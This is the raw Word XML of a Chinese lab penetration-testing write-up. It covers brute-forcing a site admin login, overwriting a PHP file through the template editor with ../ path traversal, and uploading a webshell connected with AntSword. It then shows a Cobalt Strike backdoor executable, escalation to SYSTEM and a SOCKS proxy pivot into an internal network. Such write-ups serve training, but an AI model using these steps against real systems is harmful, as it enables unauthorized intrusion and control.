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0A7FDA" w14:textId="158B0AC6" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一 渗透测试</w:t>
      </w:r>
      <w:r w:rsidR="00F23E98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、获取网站后台管理权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22828D78" w14:textId="166B78EB" w:rsidR="003E2166" w:rsidRDefault="009E0CD1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通过尝试爆破后台登录界面找到管理员登陆点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649A3ADD" w14:textId="730CBB4F" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32A843F3" wp14:editId="1DBCE793">
            <wp:extent cx="5274310" cy="37026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AC6D" w14:textId="623E1808" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1"/>
    <w:p w14:paraId="032CCB0B" w14:textId="437C6091" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1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密码爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15916588" w14:textId="387CD1EF" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号/密码：admin/</w:t>
      </w:r>
      <w:r>
        <w:t>123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB4E8B" w14:textId="09E08AFC" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56DA4CC0" wp14:editId="7432406C">
            <wp:extent cx="5274310" cy="38760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4BC2" w14:textId="1161782E" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录后台成功，获取管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C33A2" w14:textId="3991DA23" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B6A49BB" wp14:editId="75F10D91">
            <wp:extent cx="5274310" cy="37611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2234" w14:textId="3BA2627F" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1"/>
    <w:p w14:paraId="5FA96E7D" w14:textId="2877334A" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1"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在模板管理功能点找到上传一句话的地方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF77339" w14:textId="33102983" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里可以对模板进行修改，可能存在任意文件修改的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D545DC4" w14:textId="27213C1D" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F8A70EE" wp14:editId="2A0EB96E">
            <wp:extent cx="5274310" cy="37953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97F7" w14:textId="77777777" w:rsidR="00F23E98" w:rsidRDefault="00F23E98"/>
    <w:p w14:paraId="410BDFCE" w14:textId="12291B2F" w:rsidR="009E0CD1" w:rsidRDefault="009E0CD1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>具体操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFDA36F" w14:textId="4064E2B6" w:rsidR="00981CE3" w:rsidRDefault="009E0CD1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981CE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击编辑，</w:t>
      </w:r>
      <w:r w:rsidR="00981CE3">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00981CE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795A3AB4" w14:textId="51A087BD" w:rsidR="00981CE3" w:rsidRDefault="00981CE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38AEED2B" wp14:editId="3D8926C1">
            <wp:extent cx="5274310" cy="3956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FE6D" w14:textId="65BA6FD2" w:rsidR="00981CE3" w:rsidRDefault="00981CE3" w:rsidP="00F23E98">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pP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修改文件名为网站现有的php文件，由于admin管理员所在的文件与首页的文件不在一个目录路径中，所以需要用.</w:t>
      </w:r>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>穿越到首页php文件所在路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60C400" w14:textId="152989B3" w:rsidR="00981CE3" w:rsidRDefault="00981CE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA6D9CF" wp14:editId="4AE02CF5">
            <wp:extent cx="5274310" cy="3956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45192" w14:textId="7D5989DF" w:rsidR="00981CE3" w:rsidRDefault="00981CE3" w:rsidP="00F23E98">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F23E98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:t>forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，进入浏览器，看到可以编辑a</w:t>
      </w:r>
      <w:r>
        <w:t>dd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3054C4C1" w14:textId="3ED51D1E" w:rsidR="00981CE3" w:rsidRDefault="00981CE3" w:rsidP="00F23E98">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证一下是否能够修改成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CAD5AD" w14:textId="5DBA4D27" w:rsidR="00981CE3" w:rsidRDefault="00981CE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27F3C0B3" wp14:editId="14AD76FC">
            <wp:extent cx="5274310" cy="3956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C66E" w14:textId="27868E22" w:rsidR="00981CE3" w:rsidRDefault="00981CE3" w:rsidP="00F23E98">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="003372F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功说明写入成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B999616" w14:textId="199104AC" w:rsidR="00981CE3" w:rsidRDefault="00981CE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A0EB53" wp14:editId="37A394D2">
            <wp:extent cx="5274310" cy="39560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4A2A" w14:textId="65A49AC8" w:rsidR="00981CE3" w:rsidRDefault="00981CE3" w:rsidP="00F23E98">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pP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上传一句话，用蚁剑连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2D74D" w14:textId="585BF09F" w:rsidR="00981CE3" w:rsidRDefault="00CC478C" w:rsidP="00F23E98">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF66E5" w14:textId="0E154F20" w:rsidR="00981CE3" w:rsidRDefault="00981CE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9BA5F9" wp14:editId="14CADF47">
            <wp:extent cx="5274310" cy="39560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A48E" w14:textId="39D18C44" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>二 获取服务器权限、提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A110848" w14:textId="6A89238E" w:rsidR="003372F0" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003372F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看服务器基础信息，发现是普通用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F1218E" w14:textId="4A7FDCE4" w:rsidR="003372F0" w:rsidRDefault="003372F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A289BC2" wp14:editId="050628E8">
            <wp:extent cx="5274310" cy="35928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49F910" wp14:editId="7BC7B080">
            <wp:extent cx="5274310" cy="16192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E58D" w14:textId="4E965DD2" w:rsidR="009B17DE" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004033CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A76CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用cs生成exe后门文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E6E95" w14:textId="7C12AAF4" w:rsidR="004055B3" w:rsidRDefault="004055B3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先需要创建一个监听器，设置ip为本机IP。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A961C32" w14:textId="73355709" w:rsidR="004055B3" w:rsidRDefault="004055B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255602A4" wp14:editId="0C988743">
            <wp:extent cx="3554646" cy="2419350"/>
            <wp:effectExtent l="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776" b="26547"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3572693" cy="2431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8F2F9" w14:textId="3858EF86" w:rsidR="004055B3" w:rsidRDefault="004055B3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>接着选择【攻击】</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【生成后门】-</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【window</w:t>
      </w:r>
      <w:r w:rsidR="00141D43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xecutable】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C77941" w14:textId="43AAE459" w:rsidR="008A76CF" w:rsidRDefault="008A76CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0452BB6A" wp14:editId="175BBC3A">
            <wp:extent cx="4482740" cy="33623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4955" cy="336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F38A" w14:textId="1258ED63" w:rsidR="002E2B10" w:rsidRDefault="002E2B10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听器选择之前添加的1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7897AF8D" w14:textId="42AD5B4A" w:rsidR="002E2B10" w:rsidRDefault="002E2B10">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BA498FB" wp14:editId="139127B7">
            <wp:extent cx="5274310" cy="29438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59FE" w14:textId="2889200C" w:rsidR="002E2B10" w:rsidRDefault="002E2B10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击generate即可生成exe后门文件，最后选择文件储存的路径即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D17BD" w14:textId="3F0337FA" w:rsidR="002E2B10" w:rsidRPr="002E2B10" w:rsidRDefault="002E2B10">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED577B9" wp14:editId="3DD8812C">
            <wp:extent cx="2571528" cy="1866900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2839" cy="187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6574" w14:textId="2A3499F6" w:rsidR="008A76CF" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A76CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用蚁剑</w:t>
      </w:r>
      <w:r w:rsidR="002E2B10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将生成的exe文件</w:t>
      </w:r>
      <w:r w:rsidR="008A76CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传到服务器，然后</w:t>
      </w:r>
      <w:r w:rsidR="002E2B10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入cmd窗口</w:t>
      </w:r>
      <w:r w:rsidR="008A76CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidR="002E2B10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65CBBA" w14:textId="42C39FFD" w:rsidR="008A76CF" w:rsidRDefault="008A76CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25D86C96" wp14:editId="555F4414">
            <wp:extent cx="5274310" cy="39560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D2AA" w14:textId="711C14B3" w:rsidR="008A76CF" w:rsidRDefault="008A76CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665ED8BC" wp14:editId="76AD32DF">
            <wp:extent cx="5274310" cy="39560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6F6B" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="603D5ED0" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004033CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A76CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cs上线的是普通用户权限</w:t>
      </w:r>
      <w:r w:rsidR="00F45719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196584F3" w14:textId="544117DD" w:rsidR="008A76CF" w:rsidRDefault="002E2B10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>右键【执行】-</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【提权】将普通用户权限</w:t>
      </w:r>
      <w:r w:rsidR="008A76CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升</w:t>
      </w:r>
      <w:r w:rsidR="008A76CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成system权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43159627" w14:textId="6D55EE0D" w:rsidR="008A76CF" w:rsidRDefault="008A76CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FC23460" wp14:editId="7851988A">
            <wp:extent cx="5274310" cy="39560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55BF" w14:textId="5282523B" w:rsidR="008A76CF" w:rsidRDefault="008A76CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F35C986" wp14:editId="176FCDD0">
            <wp:extent cx="5274310" cy="39560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9E80" w14:textId="420B6F47" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>三 设置代理、内网漫游</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A10EC7C" w14:textId="4BB8C3F9" w:rsidR="004033CF" w:rsidRDefault="004033CF">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E2B10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于内网主机只有部署网站的服务器</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的8</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="002E2B10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对外网开放，</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而内网主机是不对1</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:t>92.168.5.0</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网段开放的，</w:t>
      </w:r>
      <w:r w:rsidR="002E2B10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置代理进入内网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A42F563" w14:textId="4924CE89" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙规则设置如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24142B3F" w14:textId="330940F8" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="050E315B" wp14:editId="6FDE4A4E">
            <wp:extent cx="5274310" cy="333819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EE7B" w14:textId="2C89F12D" w:rsidR="00EB0E91" w:rsidRDefault="00EB0E91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于windows代理工具代理没有成功，因此转到kali中进行操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB6B79" w14:textId="41327773" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2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kali cs上线</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F61A52" w14:textId="69E47222" w:rsidR="00EB0E91" w:rsidRDefault="00EB0E91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接在kali上安装cs，然后生成监听器为1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.5.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的exe文件，远程连接发送给1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通过蚁剑上传并执行，最后在kali的cs中上线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5820F180" w14:textId="523A63A1" w:rsidR="00EB0E91" w:rsidRDefault="00EB0E91">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FFBAADD" wp14:editId="5F90D4A3">
            <wp:extent cx="5274310" cy="74041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FF57" w14:textId="30D43034" w:rsidR="00EB0E91" w:rsidRDefault="00EB0E91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从下图可以看出能够扫描到1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的8</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，但是ping不通该服务器以及内网主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5343C275" w14:textId="5EA222CE" w:rsidR="004033CF" w:rsidRDefault="00AC0D9A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD35A21" wp14:editId="1FE8E1A4">
            <wp:extent cx="5274310" cy="24072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F7F2" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="75AC3119" w14:textId="2D6B3020" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1E1FF1" w14:textId="3C647A14" w:rsidR="00AC0D9A" w:rsidRDefault="00AC0D9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>右键点击上线的服务器1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，选择【中转】-</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【socks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server】，记住端口号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0499E" w14:textId="411ABB11" w:rsidR="00AC0D9A" w:rsidRDefault="00AC0D9A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3232CA7E" wp14:editId="67F8712D">
            <wp:extent cx="5274310" cy="41211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1570" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="2504890A" w14:textId="63A1F118" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2"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将proxychains挂上代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013F68B" w14:textId="7FA0E25B" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将proxychains挂上代理</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要在kali的proxychains配置文件中添加设置的代理ip及端口号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A18A834" w14:textId="0D3D341C" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B91DD49" w14:textId="2891F847" w:rsidR="00AC0D9A" w:rsidRDefault="00AC0D9A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socks</w:t>
      </w:r>
      <w:r>
        <w:t>4 192.168.5.1</w:t>
      </w:r>
      <w:r w:rsidR="00EB0E91">
        <w:t xml:space="preserve"> 65181</w:t>
      </w:r>
    </w:p>
